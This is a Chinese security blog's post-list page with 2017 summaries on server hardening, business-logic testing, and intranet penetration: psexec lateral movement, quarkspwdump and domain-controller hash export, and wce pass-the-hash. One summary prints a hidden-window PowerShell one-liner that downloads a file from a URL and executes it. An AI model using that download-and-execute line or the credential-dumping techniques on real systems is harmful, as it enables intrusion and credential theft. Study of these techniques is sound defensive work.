摘要: 离开厂家多年,很久没有碰这类事件了。 回顾: 2017年9月末,接到一个朋友转述的求助信息。他一客户的服务器被黑了。服务器上所跑业务上的金额也全部被人转走了。 朋友的客户加我后,没头没尾的问我能不能做服务器加固...(难得的长假,举国欢庆啊哪有空鸟他)。 10月4号跟对方详细聊了下情况。大致明白缘由 阅读全文
posted @ 2017-10-05 15:59 懒惰不懒 阅读(2622) 评论(0) 推荐(1) 编辑
摘要: 场景一【验证码位数过短】: 在业务逻辑测试很多时候涉及到重置密码、重置身份信息等。这时候的验证信息(短信、邮件链接等)也是我们要考虑的点之一。 可以用自己的账号注册,模拟重置用户信息。查看手机接收到的验证有没有特点。(比如Google 8位 支付宝6位等)。验证码过短(甚至是验证码有规律)的时候就可 阅读全文
posted @ 2017-09-24 21:49 懒惰不懒 阅读(693) 评论(0) 推荐(0) 编辑
摘要: 如果你用类似phpstudy集成平台的话,所有你想要修改的配置基本上在phpstudy上就可以直接设置操作。但如果你的服务器是通过一步步安装的(Apache+PHP+Mysql)的话,那么就要对各功能修改的位置要有一定的了解了。 一,文件类型: 目标:http.conf 或: 2.目录限制 目标:h 阅读全文
posted @ 2017-09-24 20:38 懒惰不懒 阅读(406) 评论(0) 推荐(0) 编辑
摘要: 在给企业提加固方案的时候,检查服务器安全设置是必不可少的。 “最小权限原则”: 当一个黑客在入侵一个网络并拿到webshell的后续就是思考是否需要提权。如果此刻的webshell直接是system或者administrator权限那自然是最high的了。但是如果是以普通权限或低权限。就要考虑提权问 阅读全文
posted @ 2017-09-24 19:25 懒惰不懒 阅读(1081) 评论(0) 推荐(0) 编辑
摘要: 远程下载文件到本地并执行cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepa... 阅读全文
posted @ 2017-09-14 21:39 懒惰不懒 阅读(12230) 评论(0) 推荐(0) 编辑
摘要: psexec是一个很好的管理工具,在内网渗透中也被广泛使用。 但太“出名”也往往会遭来各种麻烦。 在有安全监听、防护的内网中使用psexec会容易触发告警。 1.psexec用法(前提:对方要开启admin$共享 且知道对方密码或者hash): 机器在第一次使用psexec的时候,会弹出确认提示框, 阅读全文
posted @ 2017-09-10 13:47 懒惰不懒 阅读(1169) 评论(0) 推荐(0) 编辑
摘要: quarkspwdump作者介绍的用法: 其中 适用于可交互式或直接登录状态。 如果是半交互式的,可以采用如下方法(网上看到的用法): 最后 阅读全文
posted @ 2017-09-07 23:20 懒惰不懒 阅读(493) 评论(0) 推荐(0) 编辑
摘要: 天下文章一大抄,我也是醉了... 一份“错误”的文章一遍又一遍的被转载,盲目转载,根本不细看。只会误导新手。 谈下windows2003域控下如何导出全部的hash信息。 1. 使用备份还原向导 2.使用高级模式 选择:只备份系统状态数据 继续下一步:选择保存位置 最终 、 等待备份完成..... 阅读全文
posted @ 2017-09-07 22:35 懒惰不懒 阅读(1222) 评论(0) 推荐(0) 编辑
摘要: 在内网渗透时,很经常会碰到好不容易提取出了hash,但是无法破解。 wce号称内网渗透神器,其中有一个功能就是hash注入。 测试环境: 目标 windows2008 【192.168.200.128】hash如下: 测试机: windows7【192.168.200.5】 在无法破解192.168 阅读全文
posted @ 2017-09-06 23:43 懒惰不懒 阅读(2789) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2017-08-19 14:48 懒惰不懒 阅读(1) 评论(0) 推荐(0) 编辑